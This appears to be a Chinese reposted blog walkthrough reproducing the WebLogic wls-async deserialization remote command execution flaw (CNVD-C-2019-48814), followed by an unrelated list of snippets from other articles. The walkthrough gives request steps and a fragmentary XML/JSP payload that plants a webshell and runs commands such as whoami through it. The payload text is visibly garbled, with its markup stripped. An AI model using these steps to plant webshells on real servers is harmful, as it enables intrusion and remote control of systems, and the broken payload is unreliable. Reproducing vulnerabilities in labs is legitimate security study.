张玉安(ღ˘⌣˘ღ)
张玉安(ღ˘⌣˘ღ)

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)

一,防御简述:

跟该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/ _async / AsyncResponseService路径下构造良好的xml格式的数据,并保存在数据中的服务器端反序列化时,执行其中的恶意代码,从而可以getshell。

影响版本:

Oracle WebLogic Server的10.3.6.0.0

Oracle WebLogic Server的12.1.3.0.0

Oracle WebLogic Server的12.2.1.1.0

Oracle WebLogic Server的12.2.1.2.0

二,环境建设

 靶机:windows server 2008 R2:构建weblogic服务器

三,漏洞复现

访问:  http:// your-ip:7001 / _async / AsyncResponseService

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第1张图片
payload:

	
	xxxx
	
	
	
	servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp
	");          
	while((a=in.read(b))!=-1){
	out.println(new String(b));          
	}
	out.print("");
	} 
	%>]]>
	

burp抓包,发送到repeater

将GET替换POST,然后修改内容类型为text / xml

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第2张图片

go一下,查看返回值,我们的webshel​​l.jsp已经上传完毕

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第3张图片

 访问:http://192.168.15.89:7001 / bea_wls_internal / webshel​​l.jsp?pwd = 123&cmd = whoami
  获取用户,这里通过传输cmd命令,查询信息

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第4张图片

 上传文件

Content-Type: text/xml
Content-Length: 714
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20191129103954316.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L292b3dvdm8=,size_16,color_FFFFFF,t_70)
xxxxservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/sh.jsp





这个时候你上传的文件sh.jsp内容为456就会上传到下面的目录里面

l http:// ip:port / bea_wls_internal / sh.jsp

成功后,查看写入的文件

————————————————
推荐行业大佬------Stephen Wolf
原文链接:https://blog.csdn.net/qq_45625605/article/details/103215894

你可能感兴趣的:(反序列化)

  • springboot使用kafka自定义JSON序列化器和反序列化器 zhou_zhao_xu Kafkaspring
    1.序列化器packagecom.springboot.kafkademo.serialization;importcom.alibaba.fastjson.JSON;importcom.alibaba.fastjson.JSONObject;importorg.apache.kafka.common.serialization.Serializer;importjava.util.Map;/**
  • 编程自学指南:java程序设计开发,Java 对象创建的6种方式,从new到反射:Java 对象创建全解析,new关键字,反射机制,克隆(Clone),反序列化 ,工厂模式,建造者模式 zl515035644 java自学指南java开发语言
    编程自学指南:java程序设计开发,Java对象创建的几种方式一、课程信息学习目标掌握6种主流对象创建方式的实现方法理解每种方式的适用场景与优缺点能根据需求选择最合适的创建方式避免对象创建中的常见错误(如构造器权限问题)二、课程导入:生活中的"创建"场景类比买现成的→new关键字(最常用)复制已有物品→克隆(Clone)按图纸定制→工厂模式(复杂对象)反序列化→从文件/网络恢复对象三、主流创建方式
  • java基础--序列化与反序列化的概念是什么? 阿硕的技术时间 【学习笔记】java开发语言
    经典总结序列化就是把Java对象变成一串字节流,字节流就像是一种“通用语言”,可以在不同的计算机间传递。这样做的主要目的是保存对象的状态,以便以后可以恢复。反序列化则是把这些字节流重新变回Java对象,恢复对象的状态,方便程序继续使用它。详情内容1.什么是序列化?序列化是将Java对象转换为字节流的过程。字节流是一个平台无关的格式,可以在不同的计算机系统间传输。序列化的主要目的是将对象的状态保存下
  • protubuf序列化和反序列化原理 要好好养胃 c++11c++开发语言算法linux服务器
    文章目录protubuf序列化和反序列化原理序列化:将数据结构或者对象转换成二进制字节流判断每个字段是否有设置值,有值才进行编码根据字段表示号与实际类型将字段值通过不容的编码方式进行编码将编码后的数据块按照字段类型采用不同的存储方式封装成二进制数据流反序列化:将二进制字节流转换回数据结构或者对象解析读取的二进制字节数据流将解析出来的数据存储到c++、java等对应的数据结构中varint编码:整形
  • 实现RPC框架的流量控制与限流策略 AI天才研究院 计算编程实践架构师必知必会系列计算大数据人工智能语言模型AI大模型LLMJavaPython架构设计AgentRPA
    1.背景介绍实现RPC框架的流量控制与限流策略作者:禅与计算机程序设计艺术1.背景介绍1.1RPC简介RPC(RemoteProcedureCall),即远程过程调用,是一种常见的分布式系统中的通信方式。它允许程序员像调用本地函数一样去调用网络上位于其他机器上的函数。RPC通过将参数序列化为消息,然后发送到服务器上执行相应的函数,最后将结果反序列化返回给客户端。1.2流量控制与限流策略在分布式系统
  • 服务远程调用(RPC)架构及原理 小小工匠 【SimpleRPC】rpc架构网络协议
    文章目录引言一、RPC架构与核心组件二、RPC调用流程解析三、关键技术实现1.网络通信协议2.序列化与反序列化四、RPC框架核心特性引言SimpleRPC在分布式系统中,服务远程调用(RPC)是系统解耦与可扩展性的核心技术。它通过屏蔽底层通信细节,让开发者像调用本地函数一样使用远程服务。接下来我们将深入解析RPC的核心架构、通信流程及关键特性。一、RPC架构与核心组件RPC架构分为五个核心模块,各
  • SpringBoot 整合 Avro 与 Kafka m0_74823408 面试学习路线阿里巴巴springbootkafkalinq
    优质博文:IT-BLOG-CN【需求】:生产者发送数据至kafka序列化使用Avro,消费者通过Avro进行反序列化,并将数据通过MyBatisPlus存入数据库。一、环境介绍【1】ApacheAvro1.8;【2】SpringKafka1.2;【3】SpringBoot1.5;【4】Maven3.5;4.0.0com.codenotfoundspring-kafka-avro0.0.1-SNAP
  • Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271) 又菜又爱倒腾 漏洞复现安全漏洞
    #WeblogicXMLDecoder反序列化漏洞(CVE-2017-10271)#一、漏洞简介weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。二、漏洞影响影响版本10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0三、产生原
  • Shiro反序列化漏洞原理与复现指南 豪门土狗 网络安全笔记linux
    0x01漏洞简介ApacheShiro是Java领域广泛使用的安全框架,用于身份认证、权限控制等场景。漏洞背景:Shiro在1.2.5及以下版本中,默认使用硬编码的AES加密密钥(kPH+bIxk5D2deZiIxcaaaA==),攻击者可通过构造恶意RememberMeCookie触发反序列化漏洞,导致远程代码执行(RCE)。影响版本:ApacheShiro≤1.2.5、≤1.5.2(部分版本需
  • Leetcode Hot100 第40题 297.二叉树的序列化和反序列化 onlyzzr 暑期实习刷题记录leetcode深度优先算法
    /***Definitionforabinarytreenode.*structTreeNode{*intval;*TreeNode*left;*TreeNode*right;*TreeNode(intx):val(x),left(NULL),right(NULL){}*};*/classCodec{public:intindex;//Encodesatreetoasinglestring.str
  • Fastjson反序列化漏洞分析:挖掘思维与研究方法 恩师小迪 json安全网络
    致谢首先,感谢我的小迪老师的指导与启发,让我有机会深入学习这个经典漏洞案例理解前辈们的安全研究思路。引言当分析一个广泛使用的库时,我们应该思考:为什么一个JSON解析库需要这么多特殊功能?大多数JSON库只做一件事:把JSON字符串转成对象,或者反过来。但Fastjson不同,它实现了更多功能。作为学习者,我们需要理解那些发现Fastjson漏洞的前辈们的研究方法。下面我们一起分析这个经典漏洞的发
  • 序列化和反序列化 南林yan Linux学习网络
    目录一、什么是序列化和反序列化?二、利用Jsoncpp实现序列化和反序列化1.序列化(1)使用Json::Value的toStyledString方法(2)使用Json::StreamWriterf方法(3)使用Json::FastWriterff方法2.反序列化(1)使用Json::Reader方法三、数据封装(消息定界)——解决TCP通信粘包问题一、什么是序列化和反序列化?我们之前进行网络编程
  • 【十五】Golang 结构体 张胤尘 Golanggolang开发语言后端
    欢迎来到张胤尘的开源技术站开源如江河,汇聚众志成。代码似星辰,照亮行征程。开源精神长,传承永不忘。携手共前行,未来更辉煌文章目录结构体定义初始化使用字段名初始化按字段顺序初始化使用`new`函数初始化结构体零值访问结构体可访问性访问方式结构体方法方法的调用可访问性访问方式方法接收者值接收者指针接收者其他场景结构体的比较匿名结构体结构体嵌套嵌套结构体中的方法匿名字段序列化与反序列化常见的序列化格式字
  • 2025年渗透测试面试题总结-安恒 (题目+回答) 独行soc 2025年渗透测试面试指南面试职场和发展安全web安全红蓝攻防
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录安恒1.sqlmap爆出当前数据库库名的参数是什么?2.nmap探测系统类型的参数是?3.nmap的小写-o和-A是做啥的?4.布尔盲注的具体语句是啥?5.宽字节原理6.Python是否存在反序列化漏洞?7.GET与POST传参的区别8.HTTP请求方式9.如何判断C
  • @JsonFormat @DateTimeFormat 注解 徐寿春 待整理文档java
    @JsonFormat(shape=JsonFormat.Shape.STRING,pattern="yyyy-MM-ddHH:mm:ss",timezone="GMT+8")@DateTimeFormat(pattern="yyyy-MM-ddHH:mm:ss")@JsonFormat注解用于在Java对象与JSON数据之间进行序列化和反序列化操作序列化过程时,转化为对应属性的日期时间格式。○s
  • 攻防世界Web_php_unserialize(writeup) 金昔往矣 php网络安全
    题目题目:Web_php_unserialize题号:NO.GFSJ0710解题思路:浅看代码,这题需要我们以GET的方式提交一个变量var去利用php反序列化漏洞攻击,但题目设置了对序列化对象字符串的过滤以及对非index.php文件的重定向,我们需要突破这两点。对于序列化对象的过滤其会过滤大小写的o:4,可以使用o:+4来绕过,而对于__wakeup函数而言,它会在对象进行反序列化时被调用,但
  • ctf-web:php反序列化逃逸 -- GHCTF Escape! A5rZ php网络安全
    step1寻找利用点随便注册一个进去,能写入文件isadmin){$tmp=file_get_contents("tmp/admin.html");echo$tmp;if($_POST['txt']){$content='';$content.=$_POST['txt'];file_put_contents($_POST['filename'],$content);}}else{$tmp=file
  • golang学习笔记23——golang微服务中服务间通信问题探讨 GoppViper golang学习笔记golang学习笔记后端微服务信息与通信
    推荐学习文档golang应用级os框架,欢迎stargolang应用级os框架使用案例,欢迎star案例:基于golang开发的一款超有个性的旅游计划app经历golang实战大纲golang优秀开发常用开源库汇总想学习更多golang知识,这里有免费的golang学习笔记专栏文章目录引言服务间通信的常见问题1.数据序列化与反序列化效率2.网络延迟与可靠性3.服务发现与负载均衡4.安全与认证解决方
  • Go 语言使用Protobuf 进行序列化详解 尘鹄 Go语言学习之路golang开发语言后端rpcgo
    文章目录Go语言使用Protobuf进行序列化详解1.Protobuf是什么?2.安装Protobuf及Go依赖3.编写.proto文件4.实现序列化和反序列化Go语言使用Protobuf进行序列化详解1.Protobuf是什么?以下是Protobuf官方中文文档的概述:Protobuf(ProtocolBuffers)是一种语言中立、平台中立的可扩展机制,用于序列化结构化数据。它类似于JSON,
  • 10.1go常用包json chxii go语言基础golangjson开发语言
    序列化(Marshal):将Go的数据结构转换为JSON字符串。反序列化(Unmarshal):将JSON字符串转换为Go的数据结构。使用json.Marshal进行序列化json.Marshal函数可以将Go的数据结构转换为JSON格式的字节切片([]byte)packagemainimport("encoding/json""fmt""log")//定义一个结构体typePersonstruc
  • django中序列化器serializer 的高级使用和需要注意的点 小赖同学啊 pythondjangosqlitepython
    在DjangoRESTframework(DRF)中,序列化器(Serializer)是一个强大的工具,用于将复杂的数据类型(如Django模型实例)转换为Python原生数据类型,以便将其渲染为JSON、XML等格式,同时也能将接收到的外部数据反序列化为Django模型实例。以下将介绍序列化器的高级使用方法以及需要注意的点。高级使用1.嵌套序列化器当模型之间存在关联关系(如外键、多对多关系)时,
  • Redis为什么要自定义序列化?如何实现自定义序列化器? 小马不敲代码 后端redis序列化
    在Redis中,通常会使用自定义序列化器,那么,Redis为什么需要自定义序列化器,该如何实现它?1、为什么需要自定义序列化器?整体来说,Redis需要自定义序列化器,主要有以下几个原因:1.1性能优化序列化效率:默认的序列化器(如Java的JDK序列化)可能效率较低,尤其是在处理大型对象或高并发场景下。反序列化效率:快速的反序列化可以减少应用响应时间,提升整体性能。1.2存储空间优化紧凑的存储格
  • java byte序列化,java对象序列化byte[] and byte[]反序列化对象--转 xiangzi92 javabyte序列化
    importjava.io.ByteArrayInputStream;importjava.io.ByteArrayOutputStream;importjava.io.IOException;importjava.io.ObjectInputStream;importjava.io.ObjectOutputStream;publicclassObjectAndByte{/***对象转数组*@pa
  • 【新手向】从零开始学习Java(Day27)Java 序列化 星河天欲瞩 从零开始学习Java学习java开发语言jvmvscode后端
    每天二十分钟,成就Java大神,点点关注不迷路!今天是第二十七天,给坚持到这里的小伙伴点个赞!船在大风中走得更快,共勉!目录用法例子注意事项版本控制serialVersionUIDtransient关键字自定义序列化下节预告Java序列化是一种将对象转换为字节流的过程,以便可以将对象保存到磁盘上,将其传输到网络上,或者将其存储在内存中,以后再进行反序列化,将字节流重新转换为对象。序列化是一种用于保
  • Json工具(一)- Jackson 小胖子许愿 Jsonjsonjavaspring
    1、Jackson简介Jackson是常用的高效安全的Json序列化和反序列化框架。SpringMVC默认的json解析器是Jackson。Jackson有三个核心模块。jackson-core:提供Jackson处理JSON数据的核心功能,如流式解析和生成JSON,提供基本的API。jackson-annotations:提供注解编程相关的核心注解。jackson-databind:提供数据绑定
  • Golang 反射 不7夜宵 基础知识开发语言后端golang
    一、Go反射的应用场景(一)对象序列化和反序列化场景描述在处理网络通信,数据存储等场景中,需要将对象转换为字节流(序列化)以便传输或存储,在接收端再将字节流转换回对象(反序列化)。反射可以在不知道对象具体结构的情况下,遍历对象的字段进行序列化和反序列化操作。优势灵活性高,能够处理各种不同类型的对象,而不需要为每个类型单独编写序列化和反序列化函数(二)框架开发场景描述例如在Web框架中,需要根据用户
  • Python学习第九天 Leo来编程 Python学习学习
    序列化和反序列概念在Python中,序列化是将对象转换为可存储或传输的格式(如字节流或字符串),而反序列化则是将序列化后的数据重新转换为对象(官网序列化)。序列化:就是将不能存储的对象转为可存储的对象(封存pickling)。发序列化:序列化的对象返回成原来的对象(解封unpickling)。方式序列化和反序列化有下面五种方式pickle模块官网概念:pickle模块实现了对一个Python对象结
  • PHP反序列化漏洞POP链详解 - Yii框架案例分析 (②) 恩师小迪 android前端javascript
    POP链的第二条路:从Faker\Generator开始现在,让我们一步步解析这条攻击链。我们将从Faker\Generator类的__call魔术方法开始,追踪到最终执行危险函数的地方。第一步:触发__call魔术方法在PHP中,当你尝试调用一个对象中不存在的方法时,如果该对象定义了__call魔术方法,PHP会自动调用它。假设我们有一个Faker\Generator对象:$generator=
  • 什么是序列化?什么是反序列化? 重生之我在成电转码 java八股序列化反序列化
    什么是序列化(Serialization)和反序列化(Deserialization)?在Java中,序列化(Serialization)和反序列化(Deserialization)是用于对象与字节流之间转换的机制,通常用于在网络传输、文件存储、缓存等场景中。1.什么是序列化(Serialization)?序列化是指将Java对象转换为字节流(bytestream)的过程,以便:存储到磁盘文件或数
  • React Native 新架构,前端开发框架 2401_83974173 2024年程序员学习reactnative架构react.js
    JSthread会先对其序列化,形成下面一条消息UIManager.createView([343,“RCTView”,31,{“backgroundColor”:-16181,“width”:200,“height”:200}])通过Bridge发到ShadowThread。ShadowTread接收到这条信息后,先反序列化,形成Shadowtree,然后传给Yoga,形成原生布局信息。接着又通
  • ASM系列四 利用Method 组件动态注入方法逻辑 lijingyao8206 字节码技术jvmAOP动态代理ASM
            这篇继续结合例子来深入了解下Method组件动态变更方法字节码的实现。通过前面一篇,知道ClassVisitor 的visitMethod()方法可以返回一个MethodVisitor的实例。那么我们也基本可以知道,同ClassVisitor改变类成员一样,MethodVIsistor如果需要改变方法成员,注入逻辑,也可以
  • java编程思想 --内部类 百合不是茶 java内部类匿名内部类
    内部类;了解外部类 并能与之通信 内部类写出来的代码更加整洁与优雅   1,内部类的创建  内部类是创建在类中的 package com.wj.InsideClass; /* * 内部类的创建 */ public class CreateInsideClass { public CreateInsideClass(
  • web.xml报错 crabdave web.xml
    web.xml报错   The content of element type "web-app" must match "(icon?,display-  name?,description?,distributable?,context-param*,filter*,filter-mapping*,listener*,servlet*,s
  • 泛型类的自定义 麦田的设计者 javaandroid泛型
       为什么要定义泛型类,当类中要操作的引用数据类型不确定的时候。 采用泛型类,完成扩展。   例如有一个学生类     Student{ Student(){ System.out.println("I'm a student....."); } }  有一个老师类  
  • CSS清除浮动的4中方法 IT独行者 JavaScriptUIcss
    清除浮动这个问题,做前端的应该再熟悉不过了,咱是个新人,所以还是记个笔记,做个积累,努力学习向大神靠近。CSS清除浮动的方法网上一搜,大概有N多种,用过几种,说下个人感受。 1、结尾处加空div标签 clear:both 1 2 3 4 .div 1 { background : #000080 ; border : 1px   s
  • Cygwin使用windows的jdk 配置方法 _wy_ jdkwindowscygwin
    1.[vim /etc/profile]    JAVA_HOME="/cgydrive/d/Java/jdk1.6.0_43"  (windows下jdk路径为D:\Java\jdk1.6.0_43)    PATH="$JAVA_HOME/bin:${PATH}"    CLAS
  • linux下安装maven 无量 mavenlinux安装
    Linux下安装maven(转) 1.首先到Maven官网 下载安装文件,目前最新版本为3.0.3,下载文件为 apache-maven-3.0.3-bin.tar.gz,下载可以使用wget命令; 2.进入下载文件夹,找到下载的文件,运行如下命令解压 tar -xvf  apache-maven-2.2.1-bin.tar.gz 解压后的文件夹
  • tomcat的https 配置,syslog-ng配置 aichenglong tomcathttp跳转到httpssyslong-ng配置syslog配置
    1) tomcat配置https,以及http自动跳转到https的配置     1)TOMCAT_HOME目录下生成密钥(keytool是jdk中的命令)      keytool -genkey -alias tomcat -keyalg RSA -keypass changeit -storepass changeit
  • 关于领号活动总结 alafqq 活动
    关于某彩票活动的总结 具体需求,每个用户进活动页面,领取一个号码,1000中的一个; 活动要求 1,随机性,一定要有随机性; 2,最少中奖概率,如果注数为3200注,则最多中4注 3,效率问题,(不能每个人来都产生一个随机数,这样效率不高); 4,支持断电(仍然从下一个开始),重启服务;(存数据库有点大材小用,因此不能存放在数据库) 解决方案 1,事先产生随机数1000个,并打
  • java数据结构 冒泡排序的遍历与排序 百合不是茶 java
    java的冒泡排序是一种简单的排序规则   冒泡排序的原理:           比较两个相邻的数,首先将最大的排在第一个,第二次比较第二个 ,此后一样;         针对所有的元素重复以上的步骤,除了最后一个     例题;将int array[]
  • JS检查输入框输入的是否是数字的一种校验方法 bijian1013 js
    如下是JS检查输入框输入的是否是数字的一种校验方法: <form method=post target="_blank"> 数字:<input type="text" name=num onkeypress="checkNum(this.form)"><br> </form>
  • Test注解的两个属性:expected和timeout bijian1013 javaJUnitexpectedtimeout
    JUnit4:Test文档中的解释:   The Test annotation supports two optional parameters.   The first, expected, declares that a test method should throw an exception.   If it doesn't throw an exception or if it
  • [Gson二]继承关系的POJO的反序列化 bit1129 POJO
    父类     package inheritance.test2; import java.util.Map; public class Model { private String field1; private String field2; private Map<String, String> infoMap
  • 【Spark八十四】Spark零碎知识点记录 bit1129 spark
    1. ShuffleMapTask的shuffle数据在什么地方记录到MapOutputTracker中的 ShuffleMapTask的runTask方法负责写数据到shuffle map文件中。当任务执行完成成功,DAGScheduler会收到通知,在DAGScheduler的handleTaskCompletion方法中完成记录到MapOutputTracker中  
  • WAS各种脚本作用大全 ronin47 WAS 脚本
       http://www.ibm.com/developerworks/cn/websphere/library/samples/SampleScripts.html    无意中,在WAS官网上发现的各种脚本作用,感觉很有作用,先与各位分享一下     获取下载 这些示例 jacl 和 Jython 脚本可用于在 WebSphere Application Server 的不同版本中自
  • java-12.求 1+2+3+..n不能使用乘除法、 for 、 while 、 if 、 else 、 switch 、 case 等关键字以及条件判断语句 bylijinnan switch
    借鉴网上的思路,用java实现: public class NoIfWhile { /** * @param args * * find x=1+2+3+....n */ public static void main(String[] args) { int n=10; int re=find(n); System.o
  • Netty源码学习-ObjectEncoder和ObjectDecoder bylijinnan javanetty
    Netty中传递对象的思路很直观: Netty中数据的传递是基于ChannelBuffer(也就是byte[]); 那把对象序列化为字节流,就可以在Netty中传递对象了 相应的从ChannelBuffer恢复对象,就是反序列化的过程 Netty已经封装好ObjectEncoder和ObjectDecoder 先看ObjectEncoder ObjectEncoder是往外发送
  • spring 定时任务中cronExpression表达式含义 chicony cronExpression
    一个cron表达式有6个必选的元素和一个可选的元素,各个元素之间是以空格分隔的,从左至右,这些元素的含义如下表所示: 代表含义            是否必须 允许的取值范围         &nb
  • Nutz配置Jndi ctrain JNDI
    1、使用JNDI获取指定资源: var ioc = { dao : { type :"org.nutz.dao.impl.NutDao", args : [ {jndi :"jdbc/dataSource"} ] } } 以上方法,仅需要在容器中配置好数据源,注入到NutDao即可.
  • 解决 /bin/sh^M: bad interpreter: No such file or directory daizj shell
    在Linux中执行.sh脚本,异常/bin/sh^M: bad interpreter: No such file or directory。   分析:这是不同系统编码格式引起的:在windows系统中编辑的.sh文件可能有不可见字符,所以在Linux系统下执行会报以上异常信息。 解决: 1)在windows下转换: 利用一些编辑器如UltraEdit或EditPlus等工具
  • [转]for 循环为何可恨? dcj3sjt126com 程序员读书
      Java的闭包(Closure)特征最近成为了一个热门话题。 一些精英正在起草一份议案,要在Java将来的版本中加入闭包特征。 然而,提议中的闭包语法以及语言上的这种扩充受到了众多Java程序员的猛烈抨击。 不久前,出版过数十本编程书籍的大作家Elliotte Rusty Harold发表了对Java中闭包的价值的质疑。 尤其是他问道“for 循环为何可恨?”[http://ju
  • Android实用小技巧 dcj3sjt126com android
    1、去掉所有Activity界面的标题栏   修改AndroidManifest.xml   在application 标签中添加android:theme="@android:style/Theme.NoTitleBar"   2、去掉所有Activity界面的TitleBar 和StatusBar    修改AndroidManifes
  • Oracle 复习笔记之序列 eksliang Oracle 序列sequenceOracle sequence
    转载请出自出处:http://eksliang.iteye.com/blog/2098859 1.序列的作用 序列是用于生成唯一、连续序号的对象 一般用序列来充当数据库表的主键值 2.创建序列语法如下:   create sequence s_emp start with 1 --开始值 increment by 1 --増长值 maxval
  • 有“品”的程序员 gongmeitao 工作
    完美程序员的10种品质     完美程序员的每种品质都有一个范围,这个范围取决于具体的问题和背景。没有能解决所有问题的   完美程序员(至少在我们这个星球上),并且对于特定问题,完美程序员应该具有以下品质:   1. 才智非凡- 能够理解问题、能够用清晰可读的代码翻译并表达想法、善于分析并且逻辑思维能力强   (范围:用简单方式解决复杂问题)  
  • 使用KeleyiSQLHelper类进行分页查询 hvt sql.netC#asp.nethovertree
    本文适用于sql server单主键表或者视图进行分页查询,支持多字段排序。KeleyiSQLHelper类的最新代码请到http://hovertree.codeplex.com/SourceControl/latest下载整个解决方案源代码查看。或者直接在线查看类的代码:http://hovertree.codeplex.com/SourceControl/latest#HoverTree.D
  • SVG 教程 (三)圆形,椭圆,直线 天梯梦 svg
    SVG <circle> SVG 圆形 - <circle> <circle> 标签可用来创建一个圆: 下面是SVG代码: <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle cx="100" c
  • 链表栈 luyulong java数据结构
    public class Node { private Object object; private Node next; public Node() { this.next = null; this.object = null; } public Object getObject() { return object; } public
  • 基础数据结构和算法十:2-3 search tree sunwinner Algorithm2-3 search tree
      Binary search tree works well for a wide variety of applications, but they have poor worst-case performance. Now we introduce a type of binary search tree where costs are guaranteed to be loga
  • spring配置定时任务 stunizhengjia springtimer
    最近因工作的需要,用到了spring的定时任务的功能,觉得spring还是很智能化的,只需要配置一下配置文件就可以了,在此记录一下,以便以后用到:     //------------------------定时任务调用的方法------------------------------ /** * 存储过程定时器 */ publi
  • ITeye 8月技术图书有奖试读获奖名单公布 ITeye管理员 活动
    ITeye携手博文视点举办的8月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 8月试读活动回顾: http://webmaster.iteye.com/blog/2102830 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《跨终端Web》 gleams:http
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他